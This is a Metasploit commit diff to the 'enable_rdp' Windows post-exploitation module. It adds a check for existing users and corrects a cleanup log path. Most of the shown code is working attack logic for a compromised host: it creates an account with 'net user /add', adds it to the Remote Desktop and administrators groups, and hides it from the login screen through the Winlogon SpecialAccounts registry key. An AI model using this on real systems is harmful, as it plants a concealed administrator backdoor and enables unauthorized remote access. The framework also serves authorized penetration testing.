Land #4386 - Fix issue #3852 (support for other languages for enable_rdp)

2014-12-15 11:37:05 -06:00 · 2014-12-15 11:37:05 -06:00 · 4c714b3eaf
parent c24fdb81b5 5eb510f7bc
commit 4c714b3eaf
1 changed files with 24 additions and 2 deletions
--- a/modules/post/windows/manage/enable_rdp.rb
+++ b/modules/post/windows/manage/enable_rdp.rb
@ -116,8 +116,21 @@ class Metasploit3 < Msf::Post
    print_status "Setting user account for logon"
    print_status "\tAdding User: #{username} with Password: #{password}"
    begin
+      if check_user(username)
+        print_error("\tThe user #{username} already exists")
+        return
+      end
+
+      user_added = false
      addusr_out = cmd_exec("cmd.exe", "/c net user #{username} #{password} /add")
+
      if addusr_out =~ /success/i
+        user_added = true
+      elsif check_user(username)
+        user_added = true
+      end
+
+      if user_added
        file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
        print_status "\tAdding User: #{username} to local group '#{rdu}'"
        cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add")
@ -125,7 +138,7 @@ class Metasploit3 < Msf::Post
        print_status "\tHiding user from Windows Login screen"
        hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'
        registry_setvaldata(hide_user_key,username,0,"REG_DWORD")
-        file_local_write(@dest,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
+        file_local_write(cleanup_rc,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
        print_status "\tAdding User: #{username} to local group '#{admin}'"
        cmd_exec("cmd.exe","/c net localgroup #{admin}  #{username} /add")
        print_status "You can now login with the created user"
@ -136,8 +149,17 @@ class Metasploit3 < Msf::Post
          print_error("\t#{l.chomp}")
        end
      end
-    rescue::Exception => e
+    rescue ::Exception => e
      print_status("The following Error was encountered: #{e.class} #{e}")
    end
  end
+
+  def check_user(user)
+    output = cmd_exec('cmd.exe', '/c net user')
+    if output.include?(user)
+        return true
+    end
+
+    false
+  end
 end